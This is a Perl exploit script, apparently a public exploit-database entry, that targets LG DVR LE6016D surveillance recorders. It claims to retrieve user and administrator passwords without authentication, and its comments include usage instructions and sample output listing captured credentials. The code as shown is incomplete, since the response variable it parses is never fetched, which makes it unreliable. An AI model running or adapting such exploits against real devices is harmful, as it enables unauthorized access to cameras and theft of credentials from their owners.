#!/usr/bin/perl # #              LG DVR LE6016D unauthenticated remote #               users/passwords disclosure exploit # # #                Copyright 2015 (c) Todor Donev #                  <todor.donev at gmail.com> #### # #  Digital video recorder (DVR) surveillance is the use of cameras, #  often hidden or concealed, that use DVR technology to record #  video for playback or immediate viewing. As technological #  innovations have made improvements in the security and #  surveillance industry, DVR surveillance has become more #  prominent and allows for easier and more versatile security #  systems in homes and businesses. A DVR surveillance security #  system can be designed for indoor use or outdoor use and can #  often involve hidden security cameras, concealed “nanny cams” #  for home security, and even personal recording devices hidden #  on a person. # #### # #  Description: #  No authentication (login) is required to exploit this vulnerability. #  This program demonstrates how unpatched security bug would enable #  hackers to gain control of a vulnerable device while sitting #  behind their keyboard, potentially thousands of miles away. #  An unauthenticated attacker that is connected to the DVR's may be #  able to retrieve the device's administrator password allowing them #  to directly access the device's configuration control panel. # #### # #  Disclaimer: #  This or previous programs is for Educational purpose ONLY. Do not #  use it without permission.The usual disclaimer applies, especially #  the fact that Todor Donev is not liable for any damages caused by #  direct or indirect use of the information or functionality provided #  by these programs. The author or any Internet provider bears NO #  responsibility for content or misuse of these programs or any #  derivatives thereof. By using these programs you accept the fact #  that any damage (dataloss, system crash, system compromise, etc.) #  caused by the use of these programs is not Todor Donev's #  responsibility. # #### #                Use them at your own risk! #### # #         $ perl lg.pl 133.7.133.7:80 #            LG DVR LE6016D unauthenticated remote #              users/passwords disclosure exploit #                    u/p: admin/000000 #                    u/p: user1/000000 #                    u/p: user2/000000 #                    u/p: user3/000000 #                    u/p: LOGOUT/000000 #               Copyright 2015 (c) Todor Donev #                 <todor.donev at gmail.com> # ####     use LWP::Simple; print "   LG DVR LE6016D unauthenticated remote\n     users/passwords disclosure exploit\n"; if (@ARGV == 0) {&usg; &foot;} while (@ARGV > 0) { $t = shift(@ARGV); } for (my $i=0; $i <= 4; $i++){ if  ($r =~ m/<name>(.*)<\/name>/g){ print "           u\/p: $1\/"; } if  ($r =~ m/<pw>(.*)<\/pw>/g){ print "$1\n"; } } &foot; sub usg(){ print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n"; } sub foot(){ print "      Copyright 2015 (c) Todor Donev\n        <todor.donev at gmail.com>\n"; exit; }